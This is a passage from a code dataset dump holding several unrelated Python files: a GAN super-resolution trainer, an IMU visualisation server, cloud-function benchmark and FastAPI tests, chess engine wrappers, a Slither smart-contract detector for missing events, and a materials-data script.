batch_size, lambda_adv=5e-3, lambda_pixel=1e-2, b1=0.9, b2=0.999, channels=3, feature_space=64, device='cpu', lr=0.0002, num_workers=1):\r\n\r\n self.train_dataset = ResolutionDataset(lr_dir_train, hr_dir_train, lr_length, hr_length)\r\n self.test_dataset = ResolutionDataset(lr_dir_test, hr_dir_test, lr_length, hr_length)\r\n\r\n self.train_loader = torch.utils.data.DataLoader(self.train_dataset, batch_size=batch_size, shuffle=True, num_workers=num_workers)\r\n self.test_loader = torch.utils.data.DataLoader(self.test_dataset, batch_size=batch_size, shuffle=True, 
num_workers=num_workers)\r\n\r\n self.batch_size = batch_size\r\n self.device = device\r\n self.lambda_adv = lambda_adv\r\n self.lambda_pixel = lambda_pixel\r\n\r\n self.gen = Generator(channels, feature_space).to(self.device)\r\n self.dis = Discriminator(hr_length, channels, feature_space).to(self.device)\r\n self.ext = FeatureExtractor().to(self.device)\r\n\r\n self.loss_func_logits = nn.BCEWithLogitsLoss().to(self.device)\r\n self.content_loss_func = nn.L1Loss().to(self.device)\r\n self.pixel_loss_func = nn.L1Loss().to(self.device)\r\n\r\n self.optimizer_g = optim.Adam(self.gen.parameters(), lr=lr, betas=(b1, b2))\r\n self.optimizer_d = optim.Adam(self.dis.parameters(), lr=lr, betas=(b1, b2))\r\n\r\n def train(self, epochs, saved_image_directory, saved_model_directory):\r\n start_time = time.time()\r\n\r\n gen_loss_list = []\r\n dis_loss_list = []\r\n\r\n for epoch in range(epochs):\r\n cur_time = time.time()\r\n for i, (low_res_images, high_res_images) in enumerate(self.train_loader):\r\n iterations_completed = epoch*len(self.train_loader) + i\r\n\r\n b_size = len(low_res_images)\r\n\r\n low_res_images = low_res_images.to(self.device)\r\n high_res_images = high_res_images.to(self.device)\r\n\r\n real = torch.ones((b_size, *self.dis.output_shape)).to(self.device)\r\n fake = torch.zeros((b_size, *self.dis.output_shape)).to(self.device)\r\n\r\n # train generator\r\n self.optimizer_g.zero_grad()\r\n\r\n fake_images = self.gen(low_res_images)\r\n\r\n #pixel loss\r\n p_loss = self.pixel_loss_func(fake_images, high_res_images)\r\n\r\n # train generator over pixel loss for a certain number of iterations before introducing discriminator\r\n if iterations_completed < 500:\r\n p_loss.backward()\r\n self.optimizer_g.step()\r\n print(' [{}/{}][{}/{}], Pixel loss: {:.4f}\\n'.format(epoch, epochs, i, len(self.train_loader), p_loss.item()))\r\n continue\r\n\r\n r_pred = self.dis(high_res_images.to(self.device)).detach()\r\n f_pred = self.dis(fake_images)\r\n\r\n loss_g = self.loss_func_logits(f_pred - r_pred.mean(0, keepdim=True), real)\r\n\r\n fake_features = self.ext(fake_images)\r\n real_features = self.ext(high_res_images).detach()\r\n content_loss = self.content_loss_func(fake_features, real_features)\r\n\r\n g_loss = content_loss + self.lambda_adv*loss_g + self.lambda_pixel*p_loss\r\n\r\n g_loss.backward()\r\n self.optimizer_g.step()\r\n\r\n # train discriminator\r\n\r\n self.optimizer_d.zero_grad()\r\n\r\n r_pred = self.dis(high_res_images)\r\n f_pred = self.dis(fake_images.detach())\r\n\r\n r_loss = self.loss_func_logits(r_pred - f_pred.mean(0, keepdim=True), real)\r\n f_loss = self.loss_func_logits(f_pred - r_pred.mean(0, keepdim=True), fake)\r\n\r\n d_loss = (r_loss + f_loss) / 2\r\n\r\n d_loss.backward()\r\n self.optimizer_d.step()\r\n\r\n if i % 10 == 0:\r\n print(' [{}/{}][{}/{}], Gen Loss: {:.4f}, Dis Loss: {:.4f}\\n'.format(epoch, epochs, i, len(self.train_loader), g_loss.item()/b_size, d_loss.item()/b_size))\r\n gen_loss_list.append(g_loss.item()/b_size)\r\n dis_loss_list.append(d_loss.item()/b_size)\r\n\r\n cur_time = time.time() - cur_time\r\n\r\n print('Time Taken: {:.4f} seconds. 
Estimated {:.4f} hours remaining\\n'.format(cur_time, (epochs-epoch)*(cur_time)/3600))\r\n\r\n # show samples\r\n low_res_sample, high_res_sample = next(iter(self.test_loader))\r\n idx = np.random.randint(0, self.batch_size, 1)\r\n fake_image = self.gen(low_res_sample[idx].to(self.device))\r\n fake_image = fake_image.cpu().detach()\r\n ground_truth = high_res_sample[idx]\r\n image_grid = torchvision.utils.make_grid([fake_image[0], ground_truth[0]], nrow=2, normalize=True)\r\n _, plot = plt.subplots(figsize=(12, 12))\r\n plt.axis('off')\r\n plot.imshow(image_grid.permute(1, 2, 0))\r\n plt.savefig(saved_image_directory + '/epoch_{}_checkpoint.jpg'.format(epoch), bbox_inches='tight')\r\n\r\n # save models to model_directory\r\n torch.save(self.gen.state_dict(), saved_model_directory + '/generator_{}.pt'.format(epoch))\r\n torch.save(self.dis.state_dict(), saved_model_directory + '/discriminator_{}.pt'.format(epoch))\r\n torch.save(self.optimizer_g.state_dict(), saved_model_directory + '/optimizer_g_{}.pt'.format(epoch))\r\n torch.save(self.optimizer_d.state_dict(), saved_model_directory + '/optimizer_d_{}.pt'.format(epoch))\r\n\r\n\r\n finish_time = time.time() - start_time\r\n print('Training Finished. Took {:.4f} seconds or {:.4f} hours to complete.'.format(finish_time, finish_time/3600))\r\n return gen_loss_list, dis_loss_list\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Hyperparameters for training GAN')\r\n\r\n # hyperparameter loading\r\n parser.add_argument('--lr_dir_train', type=str,default='data/DIV2K_train_LR_mild', help='directory to low resolution training set')\r\n parser.add_argument('--hr_dir_train', type=str,default='data/DIV2K_train_HR', help='directory to high resolution training set')\r\n parser.add_argument('--lr_dir_test', type=str,default='data/DIV2K_valid_LR_mild', help='directory to low resolution test set')\r\n parser.add_argument('--hr_dir_test', type=str,default='data/DIV2K_valid_HR', help='directory to high resolution test set')\r\n parser.add_argument('--lr_length', type=int,default=128, help='Length of low resolution image (square image ideal)')\r\n parser.add_argument('--hr_length', type=int,default=512, help='Length of high resolution image (square image ideal)')\r\n parser.add_argument('--saved_image_directory', type=str, default='data/saved_images', help='directory to where image samples will be saved')\r\n parser.add_argument('--saved_model_directory', type=str, default='saved_models', help='directory to where model weights will be saved')\r\n parser.add_argument('--batch_size', type=int, default=64, help='size of batches passed through networks at each step')\r\n parser.add_argument('--lambda_adv', type=float, default=5e-3, help='lambda factor for gan loss')\r\n parser.add_argument('--lambda_pixel', type=float, default=1e-2, help='lambda factor for generator pixel loss')\r\n parser.add_argument('--b1', type=float, default=0.9, help='optimizer beta 1 factor')\r\n parser.add_argument('--b2', type=float, default=0.999, help='optimizer beta 2 factor')\r\n parser.add_argument('--channels', type=int, default=3, help='number of color channels in images')\r\n parser.add_argument('--feature_space', type=int, default=64, help='ideal feature space for models to work in')\r\n parser.add_argument('--device', type=str, default='cpu', help='cpu or gpu depending on availability and compatability')\r\n parser.add_argument('--lr', type=float, default=0.0002, help='learning rate of models')\r\n parser.add_argument('--num_workers', type=int, 
default=0, help='workers simultaneously putting data into RAM')\r\n parser.add_argument('--epochs', type=int, default=100, help='number of iterations of dataset through network for training')\r\n args = parser.parse_args()\r\n\r\n lr_dir_train = args.lr_dir_train\r\n hr_dir_train = args.hr_dir_train\r\n lr_dir_test = args.lr_dir_test\r\n hr_dir_test = args.hr_dir_test\r\n lr_length = args.lr_length\r\n hr_length = args.hr_length \r\n saved_image_dir = args.saved_image_directory\r\n saved_model_dir = args.saved_model_directory\r\n batch_size = args.batch_size\r\n lambda_adv = args.lambda_adv\r\n lambda_pixel = args.lambda_pixel\r\n b1 = args.b1 \r\n b2 = args.b2\r\n channels = args.channels\r\n feature_space = args.feature_space\r\n device = args.device\r\n lr = args.lr\r\n num_workers = args.num_workers\r\n epochs = args.epochs\r\n\r\n gan = Trainer(lr_dir_train, hr_dir_train, lr_dir_test, hr_dir_test, lr_length, hr_length, batch_size, lambda_adv, lambda_pixel, b1, b2, channels, feature_space, device, lr, num_workers)\r\n gen_loss_lost, dis_loss_list = gan.train(\r\n epochs, saved_image_dir, saved_model_dir)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"u7javed/Image-Super-Resolution-Enhancer-via-ESRGAN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11220,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"47"} +{"seq_id":"34819662436","text":"import os\n\n\nclass DatasetCatalog(object):\n DATA_DIR = 'data'\n\n @staticmethod\n def get(name):\n if 'semantic_kitti_4d' in name:\n data_dir = DatasetCatalog.DATA_DIR\n args = dict(\n root=os.path.join(data_dir, 'semanticKITTI'),\n )\n return dict(\n factory='SemanticKittiDataset4d',\n args=args\n )\n elif 'semantic_kitti_eve' in name:\n data_dir = DatasetCatalog.DATA_DIR\n args = dict(\n root=os.path.join(data_dir, 'semanticKITTI'),\n )\n return dict(\n factory='SemanticKittiDatasetEve',\n args=args\n )\n elif 'semantic_kitti' in name:\n data_dir = DatasetCatalog.DATA_DIR\n args = dict(\n root=os.path.join(data_dir, 'semanticKITTI'),\n )\n return dict(\n factory='SemanticKittiDataset',\n args=args\n )\n else:\n raise RuntimeError(\"Dataset not available: {}\".format(name))\n","repo_name":"ecr23xx/eve","sub_path":"config/path_catalog.py","file_name":"path_catalog.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"70466149903","text":"import socket\nimport time \nimport json\nimport ast\nimport numpy as np\nimport math\nfrom vpython import *\n\nsys_time = time.time_ns\n\nHOST = '127.0.0.1'\nPORT = 4269\n\n#vpython var\nscene = canvas()\nscene2 = canvas()\n\nscene.range=5\nscene.forward=vector(-1,-1,-1)\n \nscene.width=600\nscene.height=600\n\nscene2.range=5\nscene2.forward=vector(-1,-1,-1)\n\nscene2.width=600\nscene2.height=600\n \nxarrow=arrow(canvas=scene,lenght=2, shaftwidth=.1, color=color.red,axis=vector(1,0,0))\nyarrow=arrow(canvas=scene,lenght=2, shaftwidth=.1, color=color.green,axis=vector(0,1,0))\nzarrow=arrow(canvas=scene,lenght=4, shaftwidth=.1, color=color.blue,axis=vector(0,0,1))\n \nfrontArrow=arrow(canvas=scene2,length=2,shaftwidth=.1,color=color.purple,axis=vector(1,0,0))\nupArrow=arrow(canvas=scene2,length=2,shaftwidth=.1,color=color.magenta,axis=vector(0,1,0))\nsideArrow=arrow(canvas=scene2,length=2,shaftwidth=.1,color=color.orange,axis=vector(0,0,1))\n \n# bBoard=box(length=6,width=2,height=.2,opacity=.8,pos=vector(0,0,0,))\n# 
bn=box(length=1,width=.75,height=.1, pos=vector(-.5,.1+.05,0),color=color.blue)\n# nano=box(lenght=1.75,width=.6,height=.1,pos=vector(-2,.1+.05,0),color=color.green)\n# myObj=compound([bBoard,bn,nano])\n#----\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind((HOST, PORT))\ns.listen(5)\n\nprint('server start at: %s:%s' % (HOST, PORT))\nprint('wait for connection...')\n\n#f = open(str(sys_time()) + 'log_file.txt',\"w+\")\n\ndef unsigned_to_signed(ulong):\n\tiv = ulong\n\tif(ulong & 0b1000000000000000):\n\t\tiv = -65536 + ulong\n\t\t\n\treturn iv\n\ndef R2Q(roll, pitch, yaw):\n\n\t\tqx = np.sin(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) - np.cos(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)\n\t\tqy = np.cos(roll/2) * np.sin(pitch/2) * np.cos(yaw/2) + np.sin(roll/2) * np.cos(pitch/2) * np.sin(yaw/2)\n\t\tqz = np.cos(roll/2) * np.cos(pitch/2) * np.sin(yaw/2) - np.sin(roll/2) * np.sin(pitch/2) * np.cos(yaw/2)\n\t\tqw = np.cos(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) + np.sin(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)\n\t\treturn [qx, qy, qz, qw]\n\ndef imu_decoding(sensor_data):\n acc = [ #g\n unsigned_to_signed((sensor_data[0]<<8) + sensor_data[1])*(20/2**16), \n unsigned_to_signed((sensor_data[2]<<8) + sensor_data[3])*(20/2**16),\n unsigned_to_signed((sensor_data[4]<<8) + sensor_data[5])*(20/2**16)\n ]\n #acc = [acc[0],acc[1],acc[2],0,0,0,0,0,0]\n rate = [ #rad/s\n unsigned_to_signed((sensor_data[6]<<8) + sensor_data[7])*(7*3.14/2**16),\n unsigned_to_signed((sensor_data[8]<<8) + sensor_data[9])*(7*3.14/2**16),\n unsigned_to_signed((sensor_data[10]<<8) + sensor_data[11])*(7*3.14/2**16)\n ]\n #rate = [rate[0],rate[1],rate[2],0,0,0,0,0,0]\n quat = R2Q(rate[0],rate[1],rate[2])\n #quat = [quat[0],quat[1],quat[2],quat[3],0,0,0,0,0]\n temp = [ #c\n unsigned_to_signed((sensor_data[12]<<8) + sensor_data[13])*(200/2**16),\n unsigned_to_signed((sensor_data[14]<<8) + sensor_data[15])*(200/2**16),\n unsigned_to_signed((sensor_data[16]<<8) + sensor_data[17])*(200/2**16)\n ]\n temp_b = ((sensor_data[18]<<8) + sensor_data[19])*(200/2**16) #c\n timer = ((sensor_data[20]<<8) + sensor_data[21])*(15.259022) #uS\n\n BITstatus = (sensor_data[22]<<8 + sensor_data[23])\n\n return [acc,rate,quat,temp,temp_b,timer,BITstatus]\nroll = 0.0\npitch = 0.0\nyaw = 0.0\nwhile True:\n conn, addr = s.accept()\n print('connected by ' + str(addr))\n\n while True:\n indata = conn.recv(1024)\n if len(indata) != 0: # connection closed\n indata = indata.decode()\n\n try:\n\n indata_list = ast.literal_eval(indata)\n title = 0\n\n imu_msg = indata_list[0]\n title += 1\n imu_data = imu_decoding(imu_msg)\n\n roll += float(imu_data[1][0])*0.01\n pitch += float(imu_data[1][1])*0.01\n yaw += float(imu_data[1][2])*0.01\n\n rate(100)\n k=vector(cos(yaw)*cos(pitch), sin(pitch), sin(yaw)*cos(pitch))\n y=vector(0,1,0)\n s=cross(k,y)\n v=cross(s,k)\n vrot=v*cos(roll)+cross(k,v)*sin(roll)\n\n frontArrow.axis=k\n sideArrow.axis=cross(k,vrot)\n upArrow.axis=vrot\n\n # myObj.axis=k\n # myObj.up=v\n # sideArrow.length=2\n # frontArrow.length=2\n # upArrow.length=2\n \n except:\n pass\n\n\n \ns.close()","repo_name":"Jaron0211/soft_sync","sub_path":"PTP_program/imu_sync_ptp_server_visulization.py","file_name":"imu_sync_ptp_server_visulization.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37671710662","text":"import requests\nimport multiprocessing\nfrom cloudmesh.common.Benchmark 
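# ---- Editor's aside (hedged equivalent; not part of the surrounding record) ----
# unsigned_to_signed() above reinterprets a 16-bit word as two's complement by
# testing the sign bit and subtracting 65536. struct performs the same
# reinterpretation and documents the intent:
import struct

def to_int16(word: int) -> int:
    # pack as unsigned big-endian 16-bit, then unpack the same bytes as signed
    return struct.unpack('>h', struct.pack('>H', word & 0xFFFF))[0]

assert to_int16(0x7FFF) == 32767
assert to_int16(0x8000) == -32768
assert to_int16(0xFFFF) == -1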
import Benchmark\nfrom cloudmesh.common.util import HEADING\nfrom multiprocessing import Pool\nimport sys\nimport io\n\ndef test_download_data(args):\n client_file = args[0]\n server_file = args[1]\n id = args[2]\n HEADING()\n Benchmark.Start()\n params = {'id': str(id)}\n r = requests.get(f\"https://us-east1-anthony-orlowski.cloudfunctions.net/eigenfaces_download_data_http\", params=params)\n Benchmark.Stop()\n assert r.status_code == 200\n with io.open(server_file, 'a') as f:\n f.write(r.text)\n f.close()\n print_benchmark(client_file)\n\ndef test_train(args):\n client_file = args[0]\n server_file = args[1]\n id = args[2]\n HEADING()\n Benchmark.Start()\n params = {'id': str(id)}\n r = requests.get(f\"https://us-east1-anthony-orlowski.cloudfunctions.net/eigenfaces_train_http\", params=params)\n Benchmark.Stop()\n assert r.status_code == 200\n with io.open(server_file, 'a') as f:\n f.write(r.text)\n f.close()\n print_benchmark(client_file)\n\ndef test_upload(args):\n client_file = args[0]\n server_file = args[1]\n id = args[2]\n HEADING()\n Benchmark.Start()\n params = {'id': str(id)}\n files = {'example_image.jpg': open('example_image.jpg', 'rb')}\n r = requests.post(url=f\"https://us-east1-anthony-orlowski.cloudfunctions.net/eigenfaces_upload_http\", files=files, params=params)\n Benchmark.Stop()\n assert r.status_code == 200\n with io.open(server_file, 'a') as f:\n f.write(r.text)\n f.close()\n print_benchmark(client_file)\n\ndef test_predict(args):\n client_file = args[0]\n server_file = args[1]\n id = args[2]\n HEADING()\n Benchmark.Start()\n params = {'id': str(id)}\n r = requests.get(f\"https://us-east1-anthony-orlowski.cloudfunctions.net/eigenfaces_predict_http\", params=params)\n Benchmark.Stop()\n assert r.status_code == 200\n with io.open(server_file, 'a') as f:\n f.write(r.text)\n f.close()\n print_benchmark(client_file)\n\ndef print_benchmark(client_file):\n old_stdout = sys.stdout\n new_stdout = io.StringIO()\n sys.stdout = new_stdout\n Benchmark.print()\n result = new_stdout.getvalue()\n sys.stdout = old_stdout\n with io.open(client_file, 'a') as f:\n f.write(result)\n f.close()\n\ndef run_all_tests_parallel():\n functions = [test_train, test_upload, test_predict]\n for f in functions:\n num = 30\n with Pool(num) as p:\n client_file = f'cold-start-client-{sys.argv[1]}'\n server_file = f'cold-start-server-{sys.argv[1]}'\n args = [(client_file, server_file, i) for i in range(num)]\n p.map(f, args)\n num = 30\n with Pool(num) as p:\n client_file = f'warm-start-client-{sys.argv[1]}'\n server_file = f'warm-start-server-{sys.argv[1]}'\n args = [(client_file, server_file, i) for i in range(num)]\n p.map(f, args)\n\nif __name__ == \"__main__\":\n test_train((\"client.txt\", \"server.txt\",\"1\"))\n #run_all_tests_parallel()\n #for i in range(30):\n # client_file = f'cold-start-client-{sys.argv[1]}.txt'\n # server_file = f'cold-start-server-{sys.argv[1]}.txt'\n # args = []\n # test_download_data()","repo_name":"aporlowski/ef-faas","sub_path":"service/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23087595902","text":"import pytest\n\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy_utils import database_exists, create_database\nfrom app.main import app\nfrom db.connection import get_db , Base\nfrom services.movies.moviesScore_service import 
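# ---- Editor's aside (hedged alternative; not part of the surrounding record) ----
# print_benchmark() above captures Benchmark.print() by swapping sys.stdout by
# hand. contextlib.redirect_stdout does the same capture and always restores
# stdout, even when the wrapped call raises:
import io
from contextlib import redirect_stdout

def capture_stdout(fn) -> str:
    buf = io.StringIO()
    with redirect_stdout(buf):
        fn()                     # e.g. Benchmark.print from the record above
    return buf.getvalue()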
create_movie_score\n\n\nfrom config.settings import Settings\n\nsettings = Settings()\nSQLALCHEMY_DATABASE_URL = f\"mysql+pymysql://{settings.database_user}:{settings.database_pass}@{settings.database_url}/test_db\"\n\nengine = create_engine(\n SQLALCHEMY_DATABASE_URL \n)\n\nif not database_exists(engine.url):\n create_database(engine.url)\n\nTestingSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\n@pytest.fixture()\ndef session():\n Base.metadata.drop_all(bind=engine)\n Base.metadata.create_all(bind=engine)\n\n db = TestingSessionLocal()\n\n try:\n yield db\n finally:\n db.close()\n\n@pytest.fixture()\ndef client(session):\n # Dependency override\n def override_get_db():\n try:\n yield session\n finally:\n session.close()\n app.dependency_overrides[get_db] = override_get_db\n yield TestClient(app)\n\ndef test_movie_score_get_all(client):\n res = client.get(\"/api/movies_score\")\n assert res.status_code == 200\n\ndef test_movie_score_get_one(client):\n res = client.get(\"/api/movie_score/?movie_name=string&movie_provider=string\")\n assert res.status_code == 404\n assert res.json()['detail'] == \"Movie not found\"\n\n\ndef test_create_todos(client):\n res = client.post(\"/api/movie_score\", json={\"movie\": \"Geoscape\", \"provider\": \"Australia\", \"score\": 9.3})\n assert res.status_code == 201\n res = client.post(\"/api/movie_score\", json={\"movie\": \"Geoscape\", \"provider\": \"Australia\", \"score\": 9.3})\n assert res.status_code == 400\n assert res.json()['detail'] == \"Movie is already registered\"\n","repo_name":"AlexHorvatGeo/geoscape-api-movies-score","sub_path":"movies-score-back-api/app/test/movieScore_routes_test/movieScore_crud_test.py","file_name":"movieScore_crud_test.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40905521059","text":"from enum import Enum\nfrom subprocess import Popen, PIPE, STDOUT\nfrom PythonChessLibrary.tools import *\nimport re, random, sys, berserk\n\n\nclass BasePlayer:\n\tdef get_move(self, game):\n\t\t\"\"\"Method Documentation\"\"\"\n\t\treturn\n\n\tdef ask_draw(self, game):\n\t\t\"\"\"Method Documentation\"\"\"\n\t\treturn\n\n\tdef init(self):\n\t\t\"\"\"Method Documentation\"\"\"\n\t\treturn\n\n\tdef __init__(self, *args, **kwargs):\n\t\tself.debug = args[0]\n\n\t\tself.__dict__.update(kwargs)\n\n\t\tself.init()\n\t\t\n\nclass OnlinePlayer(BasePlayer):\n\tdef get_move(self, game):\n\t\tprint(\"getting move for online player\")\n\t\t# wait for the online player to make a move and then report it\n\t\tfor event in self.client.client.bots.stream_game_state(self.client.gameid):\n\t\t\tprint(event)\n\t\t\tif event['type'] == 'gameState':\n\t\t\t\treturn event['moves'].split(\" \")[-1]\n\n\tdef send_move(self, move):\n\t\tself.client.client.bots.make_move(self.client.gameid, move)\n\nclass UserPlayer(BasePlayer):\n\tdef get_move(self, game):\n\t\tprint(\"Input your move ---> \", end=\"\")\n\t\treturn input()\n\nclass RandomPlayer(BasePlayer):\n\tdef get_move(self, chessnut):\n\t\tmoves = chessnut.get_moves()\n\t\tif len(moves) == 0:\n\t\t\tprint(\"Move History: \" + str(chessnut.move_history), file=sys.stderr)\n\t\t\tprint(\"fen string: \" + str(chessnut.get_fen()), file=sys.stderr)\n\t\t\tprint(\"_all_moves: \" + str(chessnut._all_moves(player='b')), file=sys.stderr)\n\t\tdprint(\"Possible Moves: \" + str(moves), self.debug)\n\n\t\treturn moves[random.randint(0, len(moves)-1)]\n\nclass 
BotPlayer(BasePlayer):\n\tdef get_move(self, game):\n\t\t# Choose a random starting move if we are testing with bots\n\t\tif hasattr(game, 'test_mode') and len(game.chessnut_game.move_history) == 0:\n\t\t\tvalid_moves = game.chessnut_game.get_moves()\n\t\t\treturn valid_moves[random.randint(0, len(valid_moves)-1)]\n\n\t\t# start a new game to be safe\n\t\tself.proc.stdin.write(\"ucinewgame\\n\")\n\n\t\t# give state\n\t\tself.proc.stdin.write(\"position fen \" + game.chessnut_game.get_fen() + \"\\n\")\n\n\t\t#tell it to search\n\t\tself.proc.stdin.write(\"go wtime 122000 btime 120000 winc 2000 binc 2000 depth 8\\n\")\n\n\t\tself.proc.stdin.flush()\n\n\t\tdprint(\"finding best move...\", self.debug)\n\n\t\t#read in best move\n\t\tresponse = \"\"\n\t\twhile not response.startswith(\"bestmove\"):\n\t\t\tresponse = self.proc.stdout.readline()\n\n\t\t# Parse the response string\n\t\tmove = response.split(\" \")[1].strip()\n\n\t\treturn move\n\n\tdef init(self):\n\t\tengine_path = self.engine_path if self.engine_path else get_config_dict()['engine_path']\n\t\tself.proc = Popen([engine_path], stdin=PIPE, stdout=PIPE, stderr=STDOUT, encoding='UTF8')\n\n\t\t#read intro\n\t\tresponse = self.proc.stdout.readline()\n\t\tdprint(response, self.debug, end=\"\")\n\n\t\t#tell it to use uci\n\t\tself.proc.stdin.write(\"uci\\n\")\n\t\tself.proc.stdin.flush()\n\t\t\n\t\tresponse = \"\"\n\t\twhile response.strip() != \"uciok\":\n\t\t\tresponse = self.proc.stdout.readline()\n\t\t\tdprint(response, self.debug, end=\"\")\n\n\t\t#setoptions if you want\n\t\t#setoption name Hash value 32\n\t\t#info string Hash table allocation: Windows large pages not used.\n\n\t\t#indicate ready\n\t\tself.proc.stdin.write(\"isready\\n\")\n\t\tself.proc.stdin.flush()\n\t\tresponse = self.proc.stdout.readline()\n\t\tif response.strip() != \"readyok\":\n\t\t\t#fucking panic or something idk\n\t\t\tprint(\"Oh shit it aint ready coach. 
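# ---- Editor's aside (hedged sketch; not part of the surrounding record) ----
# BotPlayer above repeats a "read lines until the expected UCI token" loop for
# uciok / readyok / bestmove. The pattern factors into one helper; proc is any
# text-mode Popen like the one BotPlayer.init() creates.
def read_until(proc, prefix: str) -> str:
    # drain engine output until a line starts with the expected token
    while True:
        line = proc.stdout.readline()
        if line.startswith(prefix):
            return line.strip()
# e.g.  proc.stdin.write('go depth 8\n'); proc.stdin.flush()
#       move = read_until(proc, 'bestmove').split(' ')[1]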
Engine said: \", response.strip())\n\t\t\texit(0)\n\n\t\t#start new uci game\n\t\tself.proc.stdin.write(\"ucinewgame\\n\")","repo_name":"jschultz38/PythonChessLibrary","sub_path":"PythonChessLibrary/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72904847503","text":"\"\"\"\nModule detecting missing events for critical contract parameters set by owners and used in arithmetic\n\n\"\"\"\nfrom typing import List, Tuple\n\nfrom slither.analyses.data_dependency.data_dependency import is_tainted\nfrom slither.core.cfg.node import Node\nfrom slither.core.declarations.contract import Contract\nfrom slither.core.declarations.function_contract import FunctionContract\nfrom slither.core.solidity_types.elementary_type import ElementaryType, Int, Uint\nfrom slither.core.variables.state_variable import StateVariable\nfrom slither.detectors.abstract_detector import (\n AbstractDetector,\n DetectorClassification,\n DETECTOR_INFO,\n)\nfrom slither.slithir.operations.event_call import EventCall\nfrom slither.utils.output import Output\n\n\nclass MissingEventsArithmetic(AbstractDetector):\n \"\"\"\n Missing events for critical contract parameters set by owners and used in arithmetic\n \"\"\"\n\n ARGUMENT = \"events-maths\"\n HELP = \"Missing Events Arithmetic\"\n IMPACT = DetectorClassification.LOW\n CONFIDENCE = DetectorClassification.MEDIUM\n\n WIKI = \"https://github.com/crytic/slither/wiki/Detector-Documentation#missing-events-arithmetic\"\n WIKI_TITLE = \"Missing events arithmetic\"\n WIKI_DESCRIPTION = \"Detect missing events for critical arithmetic parameters.\"\n\n # region wiki_exploit_scenario\n WIKI_EXPLOIT_SCENARIO = \"\"\"\n```solidity\ncontract C {\n\n modifier onlyOwner {\n if (msg.sender != owner) throw;\n _;\n }\n\n function setBuyPrice(uint256 newBuyPrice) onlyOwner public {\n buyPrice = newBuyPrice;\n }\n\n function buy() external {\n ... // buyPrice is used to determine the number of tokens purchased\n } \n}\n```\n`setBuyPrice()` does not emit an event, so it is difficult to track changes in the value of `buyPrice` off-chain. 
\n\"\"\"\n # endregion wiki_exploit_scenario\n\n WIKI_RECOMMENDATION = \"Emit an event for critical parameter changes.\"\n\n @staticmethod\n def _detect_unprotected_use(\n contract: Contract, sv: StateVariable\n ) -> List[Tuple[Node, FunctionContract]]:\n unprotected_functions = [\n function for function in contract.functions_declared if not function.is_protected()\n ]\n return [\n (node, function)\n for function in unprotected_functions\n for node in function.nodes\n if sv in node.state_variables_read\n ]\n\n def _detect_missing_events(\n self, contract: Contract\n ) -> List[Tuple[FunctionContract, List[Tuple[Node, List[Tuple[Node, FunctionContract]]]]]]:\n \"\"\"\n Detects if critical contract parameters set by owners and used in arithmetic are missing events\n :param contract: The contract to check\n :return: Functions with nodes of critical operations but no events\n \"\"\"\n results = []\n\n for function in contract.functions_entry_points:\n nodes = []\n\n # Check for any events in the function and skip if found\n # Note: not checking if event corresponds to critical parameter\n if any(ir for node in function.nodes for ir in node.irs if isinstance(ir, EventCall)):\n continue\n\n # Ignore constructors and private/internal functions\n # Heuristic-1: functions writing to critical parameters are typically \"protected\".\n # Skip unprotected functions.\n if function.is_constructor or not function.is_protected():\n continue\n\n # Heuristic-2: Critical operations are where state variables are written and tainted\n # Heuristic-3: Variables of interest are int/uint types that are used (mostly in arithmetic)\n # in other unprotected functions\n # Heuristic-4: Critical operations present but no events in the function is not a good practice\n for node in function.nodes:\n for sv in node.state_variables_written:\n if (\n is_tainted(sv, function)\n and isinstance(sv.type, ElementaryType)\n and sv.type.type in Int + Uint\n ):\n used_nodes = self._detect_unprotected_use(contract, sv)\n if used_nodes:\n nodes.append((node, used_nodes))\n\n if nodes:\n results.append((function, nodes))\n return results\n\n def _detect(self) -> List[Output]:\n \"\"\"Detect missing events for critical contract parameters set by owners and used in arithmetic\n Returns:\n list: {'(function, node)'}\n \"\"\"\n\n # Check derived contracts for missing events\n results = []\n for contract in self.compilation_unit.contracts_derived:\n missing_events = self._detect_missing_events(contract)\n for (function, nodes) in missing_events:\n info: DETECTOR_INFO = [function, \" should emit an event for: \\n\"]\n for (node, _) in nodes:\n info += [\"\\t- \", node, \" \\n\"]\n res = self.generate_result(info)\n results.append(res)\n return results\n","repo_name":"crytic/slither","sub_path":"slither/detectors/operations/missing_events_arithmetic.py","file_name":"missing_events_arithmetic.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":4676,"dataset":"github-code","pt":"47"} +{"seq_id":"8086993819","text":"__author__ = 'Deivid Aparecido Henrique'\n__email__ = 'deividaphen@gmail.com'\n\nimport pandas as pd\nimport numpy as np\nimport keras\nimport matminer\nimport pickle\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matminer.utils.io import load_dataframe_from_json, store_dataframe_as_json\n\n#dataframe with all numerical descriptors\nfdf = load_dataframe_from_json('metisdb.json')\n\n#excluding non-ionic compounds\nnot_ionic = fdf['compound possible'] == 0\nfdf = 
